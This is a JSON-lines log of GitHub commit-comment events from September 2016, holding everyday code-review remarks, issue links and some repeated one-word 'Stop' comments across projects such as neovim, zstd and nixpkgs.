{"id":"4519560178","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906349,"position":107,"line":107,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T06:59:40Z","updated_at":"2016-09-06T06:59:40Z","body":"if 和 else 中的逻辑代码基本是一样的，只有url和alert里面的文字不同，可以简化一下代码"}},"created_at":"2016-09-06T06:59:40Z"}
{"id":"4519560541","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906351,"position":17,"line":441,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T06:59:46Z","updated_at":"2016-09-06T06:59:46Z","body":"Stop "}},"created_at":"2016-09-06T06:59:46Z"}
{"id":"4519561619","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906353,"position":16,"line":440,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T07:00:04Z","updated_at":"2016-09-06T07:00:04Z","body":"Stop "}},"created_at":"2016-09-06T07:00:04Z"}
{"id":"4519562366","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/attoparsec"},"payload":{"comment":{"id":18906365,"position":14,"line":438,"path":"Data/Attoparsec/Text/Internal.hs","commit_id":"59b89dcd7b6327b2c6c7f716918d7ca86de18eb2","created_at":"2016-09-06T07:00:16Z","updated_at":"2016-09-06T07:00:16Z","body":"Stop "}},"created_at":"2016-09-06T07:00:16Z"}
{"id":"4519568542","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":18906411,"position":20,"line":15,"path":"pkgs/development/python-modules/wxPython/3.0.nix","commit_id":"4f6b5f572e8af5a0de82960fafb36e3ebd54d70b","created_at":"2016-09-06T07:01:52Z","updated_at":"2016-09-06T07:01:52Z","body":"please use `buildPythonPackage` (in case of a `setup.py`) or otherwise `mkPythonDerivation`. The latter sets some additional stuff that is important for a Python package."}},"created_at":"2016-09-06T07:01:52Z"}
{"id":"4519569377","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"tsanie/dockpanelsuite"},"payload":{"comment":{"id":18906414,"position":null,"line":null,"path":null,"commit_id":"ac583863655c3dbd96b876843272e7e5df84fb38","created_at":"2016-09-06T07:02:06Z","updated_at":"2016-09-06T07:02:06Z","body":"Tracked in https://github.com/dockpanelsuite/dockpanelsuite/issues/399."}},"created_at":"2016-09-06T07:02:06Z"}
{"id":"4519575847","type":"CommitCommentEvent","actor":{"login":"mzweben"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":18906424,"position":null,"line":null,"path":null,"commit_id":"b1392070816564891935fbc2d4247cdbf92a55e9","created_at":"2016-09-06T07:03:52Z","updated_at":"2016-09-06T07:03:52Z","body":"+1"}},"created_at":"2016-09-06T07:03:52Z"}
{"id":"4519576360","type":"CommitCommentEvent","actor":{"login":"mzweben"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":18906425,"position":null,"line":null,"path":null,"commit_id":"d2a6a6f6ca1a34a09356cc027b8066e60c8e7e0a","created_at":"2016-09-06T07:04:02Z","updated_at":"2016-09-06T07:04:02Z","body":"+1"}},"created_at":"2016-09-06T07:04:02Z"}
{"id":"4519576630","type":"CommitCommentEvent","actor":{"login":"lwgojustgo"},"repo":{"name":"lwgojustgo/MyTest"},"payload":{"comment":{"id":18906426,"position":null,"line":null,"path":null,"commit_id":"9234d87d0772d87e5c7ae520cdd944acf2852432","created_at":"2016-09-06T07:04:07Z","updated_at":"2016-09-06T07:04:07Z","body":"create"}},"created_at":"2016-09-06T07:04:07Z"}
{"id":"4519579265","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18906430,"position":null,"line":null,"path":null,"commit_id":"39c2c6cde76aaca5bb7beb7db1b2c691d8783001","created_at":"2016-09-06T07:04:47Z","updated_at":"2016-09-06T07:04:47Z","body":"One of possible future improvements is indirect mechanics assignment (like \"handler\" in object types) but I have no plans for much more configuration for special spell mechanics (even with scripts) - you may assign custom mechanics but not allowed to alter hardcoded one."}},"created_at":"2016-09-06T07:04:47Z"}
{"id":"4519580448","type":"CommitCommentEvent","actor":{"login":"ZyX-I"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18906432,"position":10,"line":5487,"path":"runtime/doc/eval.txt","commit_id":"d9d2c2fcc0a6e371355a8f2942cf8cb0f3189385","created_at":"2016-09-06T07:05:06Z","updated_at":"2016-09-06T07:05:06Z","body":"Cannot be compared directly without using any of the below functions. But can be used as an argument to `reltime()`. So I think this should be something like\r\n\r\n… meaningful only when used as an argument to |reltime()|, |reltimestr()| and |reltimefloat()|."}},"created_at":"2016-09-06T07:05:06Z"}
{"id":"4519582504","type":"CommitCommentEvent","actor":{"login":"ZyX-I"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18906434,"position":15,"line":5492,"path":"runtime/doc/eval.txt","commit_id":"d9d2c2fcc0a6e371355a8f2942cf8cb0f3189385","created_at":"2016-09-06T07:05:39Z","updated_at":"2016-09-06T07:05:39Z","body":"… in the same implementation-defined format."}},"created_at":"2016-09-06T07:05:39Z"}
{"id":"4519583269","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18906438,"position":null,"line":null,"path":null,"commit_id":"39c2c6cde76aaca5bb7beb7db1b2c691d8783001","created_at":"2016-09-06T07:05:51Z","updated_at":"2016-09-06T07:05:51Z","body":"Alright, makes sense to me."}},"created_at":"2016-09-06T07:05:51Z"}
{"id":"4519583510","type":"CommitCommentEvent","actor":{"login":"emmenko"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":18906440,"position":56,"line":56,"path":"src/types.js","commit_id":"0a0d752c5c94b9f5dfcd8e64531c6640a6153d97","created_at":"2016-09-06T07:05:55Z","updated_at":"2016-09-06T07:05:55Z","body":"Yes, we can specify them (that's why it's in TODO) ;)\r\n\r\nAlso I saw that you might want to define **all** type of actions in your applications, like\r\n\r\n```js\r\nexport type Action =\r\n  { type: 'SERVICE_INIT', payload: string, meta: { service: string } } |\r\n  { type: 'SERVICE_PARAM_QUERY_PAGE', payload: number, meta: { service: string } }\r\n```\r\n\r\nIt's verbose, but flow can then validate more precise."}},"created_at":"2016-09-06T07:05:55Z"}
{"id":"4519586395","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"tsanie/dockpanelsuite"},"payload":{"comment":{"id":18906450,"position":null,"line":null,"path":null,"commit_id":"651ce3bf385d7c7d5427a7627a44900b266b077c","created_at":"2016-09-06T07:06:48Z","updated_at":"2016-09-06T07:06:48Z","body":"Tracked in https://github.com/dockpanelsuite/dockpanelsuite/issues/400"}},"created_at":"2016-09-06T07:06:48Z"}
{"id":"4519594865","type":"CommitCommentEvent","actor":{"login":"nixmaniack"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18906471,"position":null,"line":null,"path":null,"commit_id":"047b57223a8913699bc9ce52aa3046d934f40c9f","created_at":"2016-09-06T07:09:04Z","updated_at":"2016-09-06T07:09:04Z","body":"PR to fix this. https://github.com/syl20bnr/spacemacs/pull/7044"}},"created_at":"2016-09-06T07:09:04Z"}
{"id":"4519596144","type":"CommitCommentEvent","actor":{"login":"najidagher"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18906476,"position":71,"line":116,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"08716faae207e923350e6234b8c5a8f45520aea2","created_at":"2016-09-06T07:09:25Z","updated_at":"2016-09-06T07:09:25Z","body":"Aya calculation?\n\nSent from my iPhone\n\n> On Sep 6, 2016, at 8:17 AM, Mohieddine SAADEH (Dino for short) <notifications@github.com> wrote:\n> \n> @najidagher what about these calculations? I didn't understand their purpose.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-06T07:09:25Z"}
{"id":"4519596869","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18906479,"position":25,"line":122,"path":"plugins/USBPrinting/USBPrinterOutputDeviceManager.py","commit_id":"66f773434fb18ed74281602cab2a9ecc4378f283","created_at":"2016-09-06T07:09:38Z","updated_at":"2016-09-06T07:09:38Z","body":"err, yes. Changed it in 71e6733c8e36670ededc3fc887b761056f322559"}},"created_at":"2016-09-06T07:09:38Z"}
{"id":"4519602600","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"transistor1/dockpanelsuite"},"payload":{"comment":{"id":18906515,"position":null,"line":null,"path":null,"commit_id":"adcbf05a1483e926dc97aeb9f72f1b989e697ad9","created_at":"2016-09-06T07:11:17Z","updated_at":"2016-09-06T07:11:17Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/401"}},"created_at":"2016-09-06T07:11:17Z"}
{"id":"4519609021","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18906526,"position":16,"line":16,"path":"issue11/result.php","commit_id":"ba80619dcf97541977b73c1d09c1b37c7b69e642","created_at":"2016-09-06T07:13:04Z","updated_at":"2016-09-06T07:13:04Z","body":"```\r\n$stmt = $pdo->query(\"SELECT name, comments FROM topics ORDER BY no ASC\");\r\n```"}},"created_at":"2016-09-06T07:13:04Z"}
{"id":"4519610736","type":"CommitCommentEvent","actor":{"login":"sajiaghias6"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":18906528,"position":null,"line":null,"path":null,"commit_id":"dd951fc1b67b6511d6c8f0449f3d451df374ebce","created_at":"2016-09-06T07:13:30Z","updated_at":"2016-09-06T07:13:30Z","body":"i love you"}},"created_at":"2016-09-06T07:13:30Z"}
{"id":"4519619040","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"armano2/dockpanelsuite"},"payload":{"comment":{"id":18906542,"position":null,"line":null,"path":null,"commit_id":"dc284ed70236b9fad51a464ca611c86ca724e068","created_at":"2016-09-06T07:15:50Z","updated_at":"2016-09-06T07:15:50Z","body":"The same happened in upstream."}},"created_at":"2016-09-06T07:15:50Z"}
{"id":"4519619108","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18906543,"position":null,"line":null,"path":null,"commit_id":"fab6af536eb328c4ddb386e67f6f34a1cf3b4b1d","created_at":"2016-09-06T07:15:51Z","updated_at":"2016-09-06T07:15:51Z","body":"Thats all I was looking for"}},"created_at":"2016-09-06T07:15:51Z"}
{"id":"4519619641","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18906544,"position":null,"line":null,"path":null,"commit_id":"1fcae1b2aeab590d383111a998f8ad0becec552a","created_at":"2016-09-06T07:15:59Z","updated_at":"2016-09-06T07:15:59Z","body":"Alrighty, I'll say revert this one and I'll do the new versions else where so that no editing is needed to implement the Tameables"}},"created_at":"2016-09-06T07:15:59Z"}
{"id":"4519620098","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906545,"position":38,"line":38,"path":"httpModule.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:16:09Z","updated_at":"2016-09-06T07:16:09Z","body":"We're missing a `var` here"}},"created_at":"2016-09-06T07:16:09Z"}
{"id":"4519622532","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18906549,"position":5,"line":40,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/views/RemoteInputHelperView.java","commit_id":"20c5d279685073999d08617f5208ba142cdb1d04","created_at":"2016-09-06T07:16:46Z","updated_at":"2016-09-06T07:16:46Z","body":"Time to enable it?"}},"created_at":"2016-09-06T07:16:46Z"}
{"id":"4519623570","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18906553,"position":1,"line":186,"path":"index.html","commit_id":"0033cc6026057514b11c8ddfcad678a3430a1871","created_at":"2016-09-06T07:17:03Z","updated_at":"2016-09-06T07:17:03Z","body":"Stop "}},"created_at":"2016-09-06T07:17:03Z"}
{"id":"4519624184","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18906556,"position":4,"line":189,"path":"index.html","commit_id":"0033cc6026057514b11c8ddfcad678a3430a1871","created_at":"2016-09-06T07:17:13Z","updated_at":"2016-09-06T07:17:13Z","body":"Stop "}},"created_at":"2016-09-06T07:17:13Z"}
{"id":"4519625097","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18906560,"position":6,"line":191,"path":"index.html","commit_id":"0033cc6026057514b11c8ddfcad678a3430a1871","created_at":"2016-09-06T07:17:27Z","updated_at":"2016-09-06T07:17:27Z","body":"Stop "}},"created_at":"2016-09-06T07:17:27Z"}
{"id":"4519625731","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18906561,"position":4,"line":189,"path":"index.html","commit_id":"0033cc6026057514b11c8ddfcad678a3430a1871","created_at":"2016-09-06T07:17:37Z","updated_at":"2016-09-06T07:17:37Z","body":"Stop "}},"created_at":"2016-09-06T07:17:37Z"}
{"id":"4519626194","type":"CommitCommentEvent","actor":{"login":"ajamil76"},"repo":{"name":"ajamil76/abi2html-js"},"payload":{"comment":{"id":18906562,"position":null,"line":null,"path":null,"commit_id":"c9d0efc7023bb9232a3dcbe82a65f279e4a0d191","created_at":"2016-09-06T07:17:45Z","updated_at":"2016-09-06T07:17:45Z","body":"Good html-js website  ethereum"}},"created_at":"2016-09-06T07:17:45Z"}
{"id":"4519626199","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18906563,"position":3,"line":188,"path":"index.html","commit_id":"0033cc6026057514b11c8ddfcad678a3430a1871","created_at":"2016-09-06T07:17:45Z","updated_at":"2016-09-06T07:17:45Z","body":"Stop "}},"created_at":"2016-09-06T07:17:45Z"}
{"id":"4519626863","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18906567,"position":null,"line":null,"path":null,"commit_id":"0033cc6026057514b11c8ddfcad678a3430a1871","created_at":"2016-09-06T07:17:57Z","updated_at":"2016-09-06T07:17:57Z","body":"Okay, what"}},"created_at":"2016-09-06T07:17:57Z"}
{"id":"4519628694","type":"CommitCommentEvent","actor":{"login":"kiettanle"},"repo":{"name":"kiettanle/Identity"},"payload":{"comment":{"id":18906570,"position":null,"line":null,"path":null,"commit_id":"aadd908bc0a5d9bd37f79fd96a232243e6c38eaa","created_at":"2016-09-06T07:18:25Z","updated_at":"2016-09-06T07:18:25Z","body":"Init Identity Project "}},"created_at":"2016-09-06T07:18:25Z"}
{"id":"4519629705","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906571,"position":2,"line":187,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:18:43Z","updated_at":"2016-09-06T07:18:43Z","body":"Stop "}},"created_at":"2016-09-06T07:18:43Z"}
{"id":"4519630039","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906573,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:18:49Z","updated_at":"2016-09-06T07:18:49Z","body":"Stop "}},"created_at":"2016-09-06T07:18:49Z"}
{"id":"4519630411","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906575,"position":6,"line":191,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:18:55Z","updated_at":"2016-09-06T07:18:55Z","body":"Stop "}},"created_at":"2016-09-06T07:18:55Z"}
{"id":"4519630919","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906577,"position":3,"line":188,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:19:03Z","updated_at":"2016-09-06T07:19:03Z","body":"Stop "}},"created_at":"2016-09-06T07:19:03Z"}
{"id":"4519631300","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906578,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:19:10Z","updated_at":"2016-09-06T07:19:10Z","body":"Stop "}},"created_at":"2016-09-06T07:19:10Z"}
{"id":"4519632027","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906581,"position":1,"line":186,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:19:21Z","updated_at":"2016-09-06T07:19:21Z","body":"Stop "}},"created_at":"2016-09-06T07:19:21Z"}
{"id":"4519632432","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18906584,"position":null,"line":null,"path":null,"commit_id":"465a9c3781c1a4f9a943ebde5c2834bc40934ce5","created_at":"2016-09-06T07:19:29Z","updated_at":"2016-09-06T07:19:29Z","body":"Should not the game script lifetime management just call some AI_AS_Init(), AI_AS_Shutdown(), the only things that are intended to be exposed to the game module itself?\r\n\r\nI don't have an opinion on this. I may have it in two weeks when I get back from vacation. \r\n\r\nWhy going through so much trouble because of ctft alone? It's a dead game mode and much less relevant than bomb. \r\n\r\n"}},"created_at":"2016-09-06T07:19:29Z"}
{"id":"4519632874","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906586,"position":2,"line":2,"path":".gitignore","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:19:35Z","updated_at":"2016-09-06T07:19:35Z","body":"It doesn't look like this worked! I.e., I see tons of node_modules stuff here"}},"created_at":"2016-09-06T07:19:35Z"}
{"id":"4519633241","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"armano2/dockpanelsuite"},"payload":{"comment":{"id":18906590,"position":null,"line":null,"path":null,"commit_id":"48b418868dd392acdbe9c9bc55073eabe5bf9353","created_at":"2016-09-06T07:19:42Z","updated_at":"2016-09-06T07:19:42Z","body":"Similar to upstream's new theme design, but the upstream approach is better in many ways."}},"created_at":"2016-09-06T07:19:42Z"}
{"id":"4519633396","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906592,"position":1,"line":186,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:19:44Z","updated_at":"2016-09-06T07:19:44Z","body":"Stop "}},"created_at":"2016-09-06T07:19:44Z"}
{"id":"4519634007","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906593,"position":1,"line":186,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:19:54Z","updated_at":"2016-09-06T07:19:54Z","body":"Stop "}},"created_at":"2016-09-06T07:19:54Z"}
{"id":"4519634533","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906594,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:04Z","updated_at":"2016-09-06T07:20:04Z","body":"Stop "}},"created_at":"2016-09-06T07:20:04Z"}
{"id":"4519635229","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906598,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:14Z","updated_at":"2016-09-06T07:20:14Z","body":"Stop "}},"created_at":"2016-09-06T07:20:14Z"}
{"id":"4519635936","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906599,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:23Z","updated_at":"2016-09-06T07:20:23Z","body":"Stop "}},"created_at":"2016-09-06T07:20:23Z"}
{"id":"4519636477","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906600,"position":5,"line":190,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:32Z","updated_at":"2016-09-06T07:20:32Z","body":"Stop "}},"created_at":"2016-09-06T07:20:32Z"}
{"id":"4519636934","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18906601,"position":null,"line":null,"path":null,"commit_id":"4a33fee83358ac035d1373584af2c9e8dd6b72c7","created_at":"2016-09-06T07:20:40Z","updated_at":"2016-09-06T07:20:40Z","body":"\"in Frage\" und \"infrage\" sind beide korrekt, also sollte LT die auch nicht als Fehler markieren. Was die Duden-Empfehlung ist, war uns bisher egal und sollte es meiner Meinung nach auch in Zukunft sein. Man könnte die Regeln standardmäßig deaktivieren."}},"created_at":"2016-09-06T07:20:40Z"}
{"id":"4519637341","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906603,"position":1,"line":186,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:45Z","updated_at":"2016-09-06T07:20:45Z","body":"Stop "}},"created_at":"2016-09-06T07:20:45Z"}
{"id":"4519637774","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906605,"position":2,"line":187,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:51Z","updated_at":"2016-09-06T07:20:51Z","body":"Stop "}},"created_at":"2016-09-06T07:20:51Z"}
{"id":"4519638230","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906607,"position":3,"line":188,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:20:59Z","updated_at":"2016-09-06T07:20:59Z","body":"Stop "}},"created_at":"2016-09-06T07:20:59Z"}
{"id":"4519639825","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906614,"position":1,"line":186,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:21:26Z","updated_at":"2016-09-06T07:21:26Z","body":"Stop "}},"created_at":"2016-09-06T07:21:26Z"}
{"id":"4519640007","type":"CommitCommentEvent","actor":{"login":"a10ing"},"repo":{"name":"a10ing/weekjava"},"payload":{"comment":{"id":18906615,"position":1,"line":1,"path":"src/day3/Sample303.java","commit_id":"1ac7b9059cb98a81156efb1043e096472625040b","created_at":"2016-09-06T07:21:29Z","updated_at":"2016-09-06T07:21:29Z","body":"aaaaa"}},"created_at":"2016-09-06T07:21:29Z"}
{"id":"4519640178","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906617,"position":2,"line":187,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:21:32Z","updated_at":"2016-09-06T07:21:32Z","body":"Stop "}},"created_at":"2016-09-06T07:21:32Z"}
{"id":"4519641777","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906620,"position":2,"line":187,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:21:59Z","updated_at":"2016-09-06T07:21:59Z","body":"Stop "}},"created_at":"2016-09-06T07:21:59Z"}
{"id":"4519642240","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906621,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:22:08Z","updated_at":"2016-09-06T07:22:08Z","body":"Stop "}},"created_at":"2016-09-06T07:22:08Z"}
{"id":"4519643023","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906625,"position":33,"line":33,"path":"httpModule.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:22:19Z","updated_at":"2016-09-06T07:22:19Z","body":"We should probably `throw err` here so that the caller gets back a rejected promise. I believe `catch` will return a resolved promise unless you manually cause a rejection"}},"created_at":"2016-09-06T07:22:19Z"}
{"id":"4519643038","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"mururu/zstd"},"payload":{"comment":{"id":18906626,"position":4,"line":189,"path":"index.html","commit_id":"03e3f5ca5a98da8675240a95f89c92cffbc567ea","created_at":"2016-09-06T07:22:20Z","updated_at":"2016-09-06T07:22:20Z","body":"Stop "}},"created_at":"2016-09-06T07:22:20Z"}
{"id":"4519644144","type":"CommitCommentEvent","actor":{"login":"laborleben"},"repo":{"name":"SiLab-Bonn/pyBAR"},"payload":{"comment":{"id":18906630,"position":null,"line":null,"path":null,"commit_id":"193a8ff2b20c3749d65f8debde1f76cd20eca584","created_at":"2016-09-06T07:22:38Z","updated_at":"2016-09-06T07:22:38Z","body":"I also want to note that this was an Anaconda dependency bug. This is fixed now."}},"created_at":"2016-09-06T07:22:38Z"}
{"id":"4519646416","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"armano2/dockpanelsuite"},"payload":{"comment":{"id":18906631,"position":null,"line":null,"path":null,"commit_id":"0be68e575658918e6fad663ddbafd42a5886a5d9","created_at":"2016-09-06T07:23:14Z","updated_at":"2016-09-06T07:23:14Z","body":"Tracked in https://github.com/dockpanelsuite/dockpanelsuite/issues/391"}},"created_at":"2016-09-06T07:23:14Z"}
{"id":"4519650745","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"obay-mardini/NodePostgreRedis"},"payload":{"comment":{"id":18906642,"position":60,"line":60,"path":"httpModule.js","commit_id":"4802dce61f07cbd4b9c77c9d13ae36f8fbceb8bc","created_at":"2016-09-06T07:24:25Z","updated_at":"2016-09-06T07:24:25Z","body":"The structure of these two functions make good sense to me."}},"created_at":"2016-09-06T07:24:25Z"}
{"id":"4519652205","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"realm/realm-java"},"payload":{"comment":{"id":18906655,"position":21,"line":199,"path":"CONTRIBUTING.md","commit_id":"71691b35464a14a277be1f793f9a6be60ecd0d7c","created_at":"2016-09-06T07:24:48Z","updated_at":"2016-09-06T07:24:48Z","body":"I'm curious what you mean by “avoid divergence.” I'm not familiar with this usage. Are you trying to say something about reducing the probability of merge conflicts?"}},"created_at":"2016-09-06T07:24:48Z"}
{"id":"4519653462","type":"CommitCommentEvent","actor":{"login":"heiwalebron"},"repo":{"name":"heiwalebron/-"},"payload":{"comment":{"id":18906660,"position":4,"line":2,"path":"README.md","commit_id":"6835364a2143a0013a759bb661adeeae647f59d0","created_at":"2016-09-06T07:25:09Z","updated_at":"2016-09-06T07:25:09Z","body":"ahahah"}},"created_at":"2016-09-06T07:25:09Z"}
{"id":"4519654503","type":"CommitCommentEvent","actor":{"login":"beeender"},"repo":{"name":"realm/realm-java"},"payload":{"comment":{"id":18906665,"position":21,"line":199,"path":"CONTRIBUTING.md","commit_id":"71691b35464a14a277be1f793f9a6be60ecd0d7c","created_at":"2016-09-06T07:25:22Z","updated_at":"2016-09-06T07:25:22Z","body":"Yes, that is exactly what i mean :P"}},"created_at":"2016-09-06T07:25:22Z"}
{"id":"4519656840","type":"CommitCommentEvent","actor":{"login":"beeender"},"repo":{"name":"realm/realm-java"},"payload":{"comment":{"id":18906668,"position":21,"line":199,"path":"CONTRIBUTING.md","commit_id":"71691b35464a14a277be1f793f9a6be60ecd0d7c","created_at":"2016-09-06T07:26:02Z","updated_at":"2016-09-06T07:26:02Z","body":"have a better term than this? I just learned this word from @cmelchior :grin: "}},"created_at":"2016-09-06T07:26:02Z"}
